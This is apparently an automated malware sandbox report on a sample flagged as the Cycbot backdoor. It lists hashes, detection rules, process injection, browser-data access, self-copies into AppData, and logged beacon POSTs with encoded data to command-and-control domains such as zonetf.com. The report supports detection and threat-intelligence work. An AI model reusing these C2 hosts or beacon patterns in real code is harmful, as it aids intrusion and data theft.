Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
140s -
max time network
119s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system -
submitted
10/12/2024, 20:57 UTC
Static task
static1
Behavioral task
behavioral1
Sample
de74448b4a398e9df200dcfdc2c6f7e5_JaffaCakes118.exe
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
de74448b4a398e9df200dcfdc2c6f7e5_JaffaCakes118.exe
Resource
win10v2004-20241007-en
General
-
Target
de74448b4a398e9df200dcfdc2c6f7e5_JaffaCakes118.exe
-
Size
201KB
-
MD5
de74448b4a398e9df200dcfdc2c6f7e5
-
SHA1
1065fe6f58880976cfeab0e57d9f35de587a54e4
-
SHA256
b8417527766e5b64a490cafb0105e6df80dcea8a9c2dca88ce2fcc79a703724a
-
SHA512
0591178849d17f12227eea866cff806a91fae6ec8cca45fcd45aa51d89aed6adf2c9c3bf8f0b61d92156ef66b0ecf41b5d88c19cb75548bb770826ad46254517
-
SSDEEP
3072:ptZBDetdPfnhv7o4CbWnHcU3zbjgUznaBVrEOKQz6Mq3TlMg2agNFGvynNE1HJSg:ptZBDebfnhjJfDgUzSEetg2agKveUQF
Malware Config
Signatures
-
Cycbot family
-
Detects Cycbot payload 4 IoCs
Cycbot is a backdoor and trojan written in C++.
resource yara_rule behavioral1/memory/1740-5-0x0000000000400000-0x000000000044D000-memory.dmp family_cycbot behavioral1/memory/2504-12-0x0000000000400000-0x000000000044D000-memory.dmp family_cycbot behavioral1/memory/2192-78-0x0000000000400000-0x000000000044D000-memory.dmp family_cycbot behavioral1/memory/2504-168-0x0000000000400000-0x000000000044D000-memory.dmp family_cycbot -
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
resource yara_rule behavioral1/memory/2504-2-0x0000000000400000-0x000000000044D000-memory.dmp upx behavioral1/memory/1740-5-0x0000000000400000-0x000000000044D000-memory.dmp upx behavioral1/memory/2504-12-0x0000000000400000-0x000000000044D000-memory.dmp upx behavioral1/memory/2192-78-0x0000000000400000-0x000000000044D000-memory.dmp upx behavioral1/memory/2504-168-0x0000000000400000-0x000000000044D000-memory.dmp upx -
System Location Discovery: System Language Discovery 1 TTPs 3 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language de74448b4a398e9df200dcfdc2c6f7e5_JaffaCakes118.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language de74448b4a398e9df200dcfdc2c6f7e5_JaffaCakes118.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language de74448b4a398e9df200dcfdc2c6f7e5_JaffaCakes118.exe -
Suspicious use of WriteProcessMemory 8 IoCs
description pid Process procid_target PID 2504 wrote to memory of 1740 2504 de74448b4a398e9df200dcfdc2c6f7e5_JaffaCakes118.exe 31 PID 2504 wrote to memory of 1740 2504 de74448b4a398e9df200dcfdc2c6f7e5_JaffaCakes118.exe 31 PID 2504 wrote to memory of 1740 2504 de74448b4a398e9df200dcfdc2c6f7e5_JaffaCakes118.exe 31 PID 2504 wrote to memory of 1740 2504 de74448b4a398e9df200dcfdc2c6f7e5_JaffaCakes118.exe 31 PID 2504 wrote to memory of 2192 2504 de74448b4a398e9df200dcfdc2c6f7e5_JaffaCakes118.exe 33 PID 2504 wrote to memory of 2192 2504 de74448b4a398e9df200dcfdc2c6f7e5_JaffaCakes118.exe 33 PID 2504 wrote to memory of 2192 2504 de74448b4a398e9df200dcfdc2c6f7e5_JaffaCakes118.exe 33 PID 2504 wrote to memory of 2192 2504 de74448b4a398e9df200dcfdc2c6f7e5_JaffaCakes118.exe 33
Processes
-
C:\Users\Admin\AppData\Local\Temp\de74448b4a398e9df200dcfdc2c6f7e5_JaffaCakes118.exe"C:\Users\Admin\AppData\Local\Temp\de74448b4a398e9df200dcfdc2c6f7e5_JaffaCakes118.exe"1⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2504 -
C:\Users\Admin\AppData\Local\Temp\de74448b4a398e9df200dcfdc2c6f7e5_JaffaCakes118.exeC:\Users\Admin\AppData\Local\Temp\de74448b4a398e9df200dcfdc2c6f7e5_JaffaCakes118.exe startC:\Users\Admin\AppData\Roaming\Microsoft\conhost.exe%C:\Users\Admin\AppData\Roaming\Microsoft2⤵
- System Location Discovery: System Language Discovery
PID:1740
-
-
C:\Users\Admin\AppData\Local\Temp\de74448b4a398e9df200dcfdc2c6f7e5_JaffaCakes118.exeC:\Users\Admin\AppData\Local\Temp\de74448b4a398e9df200dcfdc2c6f7e5_JaffaCakes118.exe startC:\Users\Admin\AppData\Roaming\dwm.exe%C:\Users\Admin\AppData\Roaming2⤵
- System Location Discovery: System Language Discovery
PID:2192
-
Network
-
Remote address:8.8.8.8:53Requestrossroadbags.comIN AResponse
-
Remote address:8.8.8.8:53Requestzonetf.comIN AResponsezonetf.comIN A76.223.54.146zonetf.comIN A13.248.169.48
-
POSThttp://zonetf.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfJpX%2BP9h%2BI0sDkX9PiwomL2GUvg7sbefvJsSvT8t61i9hlL9PmxrHH0bV%2FmiMWrdPd5SOeikL50gB9C4viw3n%2BGGT7iirfeBfZtPJX90alxtygbpb6HvnSAMRu4pVKv975Xlm5Gde74448b4a398e9df200dcfdc2c6f7e5_JaffaCakes118.exeRemote address:76.223.54.146:80RequestPOST /index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfJpX%2BP9h%2BI0sDkX9PiwomL2GUvg7sbefvJsSvT8t61i9hlL9PmxrHH0bV%2FmiMWrdPd5SOeikL50gB9C4viw3n%2BGGT7iirfeBfZtPJX90alxtygbpb6HvnSAMRu4pVKv975Xlm5G HTTP/1.1
Host: zonetf.com
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Content-Length: 0
Connection: close
ResponseHTTP/1.1 405 Method Not Allowed
connection: close
-
Remote address:8.8.8.8:53Requestofflineservermonitoring.comIN AResponse
-
POSThttp://zonetf.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfJpX%2BP9h%2BI0sDkX9PiwomL2GUvg7sbefvJsSvT8t61i9hlL9PmxrHH0bV%2FmiMWrdPd5SOeikL50gB9C4viw3n%2BGGT7iirfeBfZtPJX90alxtygbpb6HvnSAOQij%2B8yjYvEaS%2FT%2BsqtSr%2Fe%2BV5ZuRg%3D%3Dde74448b4a398e9df200dcfdc2c6f7e5_JaffaCakes118.exeRemote address:76.223.54.146:80RequestPOST /index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfJpX%2BP9h%2BI0sDkX9PiwomL2GUvg7sbefvJsSvT8t61i9hlL9PmxrHH0bV%2FmiMWrdPd5SOeikL50gB9C4viw3n%2BGGT7iirfeBfZtPJX90alxtygbpb6HvnSAOQij%2B8yjYvEaS%2FT%2BsqtSr%2Fe%2BV5ZuRg%3D%3D HTTP/1.1
Host: zonetf.com
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Content-Length: 0
Connection: close
ResponseHTTP/1.1 405 Method Not Allowed
connection: close
-
POSThttp://zonetf.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfJpX%2BP9h%2BI0sDkX9PiwomL2GUvg7sbefvJsSvT8t61i9hlL9PmxrHH0bV%2FmiMWrdPd5SOeikL50gB9C4viw3n%2BGGT7iirfeBfZtPJX90alxtygbpb6HvnSAOQij%2B8OoYvEaSPT%2BsqpSr%2Fe%2BV5ZuRg%3D%3Dde74448b4a398e9df200dcfdc2c6f7e5_JaffaCakes118.exeRemote address:76.223.54.146:80RequestPOST /index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfJpX%2BP9h%2BI0sDkX9PiwomL2GUvg7sbefvJsSvT8t61i9hlL9PmxrHH0bV%2FmiMWrdPd5SOeikL50gB9C4viw3n%2BGGT7iirfeBfZtPJX90alxtygbpb6HvnSAOQij%2B8OoYvEaSPT%2BsqpSr%2Fe%2BV5ZuRg%3D%3D HTTP/1.1
Host: zonetf.com
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Content-Length: 0
Connection: close
ResponseHTTP/1.1 405 Method Not Allowed
connection: close
-
Remote address:8.8.8.8:53Requestzonetk.comIN AResponse
-
POSThttp://zonetf.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfJpX%2BP9h%2BI0sDkX9PiwomL2GUvg7sbefvJsSvT8t61i9hlL9PmxrHH0bV%2FmiMWrdPd5SOeikL50gB9C4viw3n%2BGGT7iirfeBfZtPJX90alxtygbpb6HvnSAOQij%2B8yvUq%2F3vleWbkY%3Dde74448b4a398e9df200dcfdc2c6f7e5_JaffaCakes118.exeRemote address:76.223.54.146:80RequestPOST /index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfJpX%2BP9h%2BI0sDkX9PiwomL2GUvg7sbefvJsSvT8t61i9hlL9PmxrHH0bV%2FmiMWrdPd5SOeikL50gB9C4viw3n%2BGGT7iirfeBfZtPJX90alxtygbpb6HvnSAOQij%2B8yvUq%2F3vleWbkY%3D HTTP/1.1
Host: zonetf.com
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Content-Length: 0
Connection: close
ResponseHTTP/1.1 405 Method Not Allowed
connection: close
-
POSThttp://zonetf.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfJpX%2BP9h%2BI0sDkX9PiwomL2GUvg7sbefvJsSvT8t61i9hlL9PmxrHH0bV%2FmiMWrdPd5SOeikL50gB9C4viw3n%2BGGT7iirfeBfZtPJX90alxtygbpb6HvnSAOQij%2B82uYvEaS%2FT%2Bsq5Sr%2Fe%2BV5ZuRg%3D%3Dde74448b4a398e9df200dcfdc2c6f7e5_JaffaCakes118.exeRemote address:76.223.54.146:80RequestPOST /index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfJpX%2BP9h%2BI0sDkX9PiwomL2GUvg7sbefvJsSvT8t61i9hlL9PmxrHH0bV%2FmiMWrdPd5SOeikL50gB9C4viw3n%2BGGT7iirfeBfZtPJX90alxtygbpb6HvnSAOQij%2B82uYvEaS%2FT%2Bsq5Sr%2Fe%2BV5ZuRg%3D%3D HTTP/1.1
Host: zonetf.com
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Content-Length: 0
Connection: close
ResponseHTTP/1.1 405 Method Not Allowed
connection: close
-
Remote address:8.8.8.8:53Requestwww.google.comIN AResponsewww.google.comIN A142.250.187.196
-
Remote address:142.250.187.196:80RequestGET / HTTP/1.0
Connection: close
Host: www.google.com
Accept: */*
ResponseHTTP/1.0 302 Found
x-hallmonitor-challenge: CgwIlNfiugYQz-7glgMSBLXXsFM
Content-Type: text/html; charset=UTF-8
Content-Security-Policy-Report-Only: object-src 'none';base-uri 'self';script-src 'nonce-yRr0VwdPngZ15b3yi7v0NQ' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/other-hp
Date: Tue, 10 Dec 2024 20:59:00 GMT
Server: gws
Content-Length: 396
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN
Set-Cookie: AEC=AZ6Zc-UDnVwSyMe3vTLWnJOR1Bozayoj4iNyLftJ5FLrikh4vSE4CnFe7o0; expires=Sun, 08-Jun-2025 20:59:00 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=lax
-
POSThttp://zonetf.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfJpX%2BP9h%2BI0sDkX9PiwomL2GUvg7sbefvJsSvT8t61i9hlL9PmxrHH0bV%2FmiMWrdPd5SOeikL50gB9C4viw3n%2BGGT7iirfeBfZtPJX90alxtygbpb6HvnSAOQij%2B82oYvEaTuLuwd129WxK5VKv975Xlm5Gde74448b4a398e9df200dcfdc2c6f7e5_JaffaCakes118.exeRemote address:76.223.54.146:80RequestPOST /index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfJpX%2BP9h%2BI0sDkX9PiwomL2GUvg7sbefvJsSvT8t61i9hlL9PmxrHH0bV%2FmiMWrdPd5SOeikL50gB9C4viw3n%2BGGT7iirfeBfZtPJX90alxtygbpb6HvnSAOQij%2B82oYvEaTuLuwd129WxK5VKv975Xlm5G HTTP/1.1
Host: zonetf.com
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Content-Length: 0
Connection: close
ResponseHTTP/1.1 405 Method Not Allowed
connection: close
-
Remote address:142.250.187.196:80RequestGET / HTTP/1.1
Connection: close
Pragma: no-cache
Host: www.google.com
ResponseHTTP/1.1 302 Found
x-hallmonitor-challenge: CgwIl9fiugYQp-KAxAISBLXXsFM
Content-Type: text/html; charset=UTF-8
Content-Security-Policy-Report-Only: object-src 'none';base-uri 'self';script-src 'nonce-61aLTSR5kyYKw8LxiJ-23w' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/other-hp
Date: Tue, 10 Dec 2024 20:59:03 GMT
Server: gws
Content-Length: 396
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN
Set-Cookie: AEC=AZ6Zc-U1oFw_ehwT-fTICYHQbZEQEjQCsg7_8QPtMsFvvrZCczZmbzeL-g; expires=Sun, 08-Jun-2025 20:59:03 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=lax
Connection: close
-
GEThttp://www.google.com/sorry/index?continue=http://www.google.com/&q=EgS117BTGJfX4roGIjCf9HQcCOBSbcZY631Je-CnypCo7jTeniJ8I4yu-uNJ3wOgsvTwDpngbls9N0Q9OvsyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUMde74448b4a398e9df200dcfdc2c6f7e5_JaffaCakes118.exeRemote address:142.250.187.196:80RequestGET /sorry/index?continue=http://www.google.com/&q=EgS117BTGJfX4roGIjCf9HQcCOBSbcZY631Je-CnypCo7jTeniJ8I4yu-uNJ3wOgsvTwDpngbls9N0Q9OvsyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM HTTP/1.1
Connection: close
Pragma: no-cache
Host: www.google.com
ResponseHTTP/1.1 429 Too Many Requests
Pragma: no-cache
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Content-Type: text/html
Server: HTTP server (unknown)
Content-Length: 3075
X-XSS-Protection: 0
Connection: close
-
76.223.54.146:80http://zonetf.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfJpX%2BP9h%2BI0sDkX9PiwomL2GUvg7sbefvJsSvT8t61i9hlL9PmxrHH0bV%2FmiMWrdPd5SOeikL50gB9C4viw3n%2BGGT7iirfeBfZtPJX90alxtygbpb6HvnSAMRu4pVKv975Xlm5Ghttpde74448b4a398e9df200dcfdc2c6f7e5_JaffaCakes118.exe553 B 245 B 5 4
HTTP Request
POST http://zonetf.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfJpX%2BP9h%2BI0sDkX9PiwomL2GUvg7sbefvJsSvT8t61i9hlL9PmxrHH0bV%2FmiMWrdPd5SOeikL50gB9C4viw3n%2BGGT7iirfeBfZtPJX90alxtygbpb6HvnSAMRu4pVKv975Xlm5GHTTP Response
405 -
76.223.54.146:80http://zonetf.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfJpX%2BP9h%2BI0sDkX9PiwomL2GUvg7sbefvJsSvT8t61i9hlL9PmxrHH0bV%2FmiMWrdPd5SOeikL50gB9C4viw3n%2BGGT7iirfeBfZtPJX90alxtygbpb6HvnSAOQij%2B8yjYvEaS%2FT%2BsqtSr%2Fe%2BV5ZuRg%3D%3Dhttpde74448b4a398e9df200dcfdc2c6f7e5_JaffaCakes118.exe635 B 245 B 6 4
HTTP Request
POST http://zonetf.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfJpX%2BP9h%2BI0sDkX9PiwomL2GUvg7sbefvJsSvT8t61i9hlL9PmxrHH0bV%2FmiMWrdPd5SOeikL50gB9C4viw3n%2BGGT7iirfeBfZtPJX90alxtygbpb6HvnSAOQij%2B8yjYvEaS%2FT%2BsqtSr%2Fe%2BV5ZuRg%3D%3DHTTP Response
405 -
76.223.54.146:80http://zonetf.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfJpX%2BP9h%2BI0sDkX9PiwomL2GUvg7sbefvJsSvT8t61i9hlL9PmxrHH0bV%2FmiMWrdPd5SOeikL50gB9C4viw3n%2BGGT7iirfeBfZtPJX90alxtygbpb6HvnSAOQij%2B8OoYvEaSPT%2BsqpSr%2Fe%2BV5ZuRg%3D%3Dhttpde74448b4a398e9df200dcfdc2c6f7e5_JaffaCakes118.exe581 B 245 B 5 4
HTTP Request
POST http://zonetf.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfJpX%2BP9h%2BI0sDkX9PiwomL2GUvg7sbefvJsSvT8t61i9hlL9PmxrHH0bV%2FmiMWrdPd5SOeikL50gB9C4viw3n%2BGGT7iirfeBfZtPJX90alxtygbpb6HvnSAOQij%2B8OoYvEaSPT%2BsqpSr%2Fe%2BV5ZuRg%3D%3DHTTP Response
405 -
76.223.54.146:80http://zonetf.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfJpX%2BP9h%2BI0sDkX9PiwomL2GUvg7sbefvJsSvT8t61i9hlL9PmxrHH0bV%2FmiMWrdPd5SOeikL50gB9C4viw3n%2BGGT7iirfeBfZtPJX90alxtygbpb6HvnSAOQij%2B8yvUq%2F3vleWbkY%3Dhttpde74448b4a398e9df200dcfdc2c6f7e5_JaffaCakes118.exe563 B 245 B 5 4
HTTP Request
POST http://zonetf.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfJpX%2BP9h%2BI0sDkX9PiwomL2GUvg7sbefvJsSvT8t61i9hlL9PmxrHH0bV%2FmiMWrdPd5SOeikL50gB9C4viw3n%2BGGT7iirfeBfZtPJX90alxtygbpb6HvnSAOQij%2B8yvUq%2F3vleWbkY%3DHTTP Response
405 -
76.223.54.146:80http://zonetf.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfJpX%2BP9h%2BI0sDkX9PiwomL2GUvg7sbefvJsSvT8t61i9hlL9PmxrHH0bV%2FmiMWrdPd5SOeikL50gB9C4viw3n%2BGGT7iirfeBfZtPJX90alxtygbpb6HvnSAOQij%2B82uYvEaS%2FT%2Bsq5Sr%2Fe%2BV5ZuRg%3D%3Dhttpde74448b4a398e9df200dcfdc2c6f7e5_JaffaCakes118.exe583 B 245 B 5 4
HTTP Request
POST http://zonetf.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfJpX%2BP9h%2BI0sDkX9PiwomL2GUvg7sbefvJsSvT8t61i9hlL9PmxrHH0bV%2FmiMWrdPd5SOeikL50gB9C4viw3n%2BGGT7iirfeBfZtPJX90alxtygbpb6HvnSAOQij%2B82uYvEaS%2FT%2Bsq5Sr%2Fe%2BV5ZuRg%3D%3DHTTP Response
405 -
394 B 1.5kB 7 5
HTTP Request
GET http://www.google.com/HTTP Response
302 -
-
76.223.54.146:80http://zonetf.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfJpX%2BP9h%2BI0sDkX9PiwomL2GUvg7sbefvJsSvT8t61i9hlL9PmxrHH0bV%2FmiMWrdPd5SOeikL50gB9C4viw3n%2BGGT7iirfeBfZtPJX90alxtygbpb6HvnSAOQij%2B82oYvEaTuLuwd129WxK5VKv975Xlm5Ghttpde74448b4a398e9df200dcfdc2c6f7e5_JaffaCakes118.exe627 B 245 B 6 4
HTTP Request
POST http://zonetf.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfJpX%2BP9h%2BI0sDkX9PiwomL2GUvg7sbefvJsSvT8t61i9hlL9PmxrHH0bV%2FmiMWrdPd5SOeikL50gB9C4viw3n%2BGGT7iirfeBfZtPJX90alxtygbpb6HvnSAOQij%2B82oYvEaTuLuwd129WxK5VKv975Xlm5GHTTP Response
405 -
307 B 1.5kB 5 5
HTTP Request
GET http://www.google.com/HTTP Response
302 -
142.250.187.196:80http://www.google.com/sorry/index?continue=http://www.google.com/&q=EgS117BTGJfX4roGIjCf9HQcCOBSbcZY631Je-CnypCo7jTeniJ8I4yu-uNJ3wOgsvTwDpngbls9N0Q9OvsyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUMhttpde74448b4a398e9df200dcfdc2c6f7e5_JaffaCakes118.exe526 B 3.7kB 6 7
HTTP Request
GET http://www.google.com/sorry/index?continue=http://www.google.com/&q=EgS117BTGJfX4roGIjCf9HQcCOBSbcZY631Je-CnypCo7jTeniJ8I4yu-uNJ3wOgsvTwDpngbls9N0Q9OvsyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUMHTTP Response
429 -
-
62 B 135 B 1 1
DNS Request
rossroadbags.com
-
56 B 88 B 1 1
DNS Request
zonetf.com
DNS Response
76.223.54.14613.248.169.48
-
73 B 146 B 1 1
DNS Request
offlineservermonitoring.com
-
56 B 129 B 1 1
DNS Request
zonetk.com
-
60 B 76 B 1 1
DNS Request
www.google.com
DNS Response
142.250.187.196
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1KB
MD5d88490002a91235ca412d4a15d136e3a
SHA1adb79c01f03740278d72d2298e2164d5098dbf0c
SHA25695f385d1cfa6dbae6f0bd38d48374537cf4f19ccbcc2b148a0138099906e5c57
SHA512262ae8babc77e8c9a6137a057cd5b40d9c729922cfcea6b2a5be8350ae10bf7d646bf5c6ba491fa5021bce33d07c0c99f7cb9bd98bea308875ad198ef3f1db02
-
Filesize
600B
MD5e49874dadf21c071163b0d0aa7c0170c
SHA17346aba8dc5b2f2f53b3cdfa6c52dea984f8a3b3
SHA25621e86468d221d534b35b2bc982b979c9267ed750e4a95d508bfcc00c61ec8489
SHA512efdb4407b5c0ea6daaea3da93bad3092e9241ba286d57f1c8495f44e5cdf02cbab579d05ae8dc4c36423cc2609998d5c627472d818d622558461d1f95561bd8e
-
Filesize
996B
MD5cc831d3dd9f663401acae75e5796ffe1
SHA18ab02aedbffef667dc64d01d15003c7cd203e4e8
SHA256a04832cb0288a05edf98d134ff79679bcf72eb93932dda5fd388c68e0f293b64
SHA512852d4ccbd91d5d9996efc783e7733875fe74b0cadbf1db8c05e41b3c59f2c71dbf83f5429dfb143b1b1c70cafa8c61e010287b7251a1744f549f0925831705f2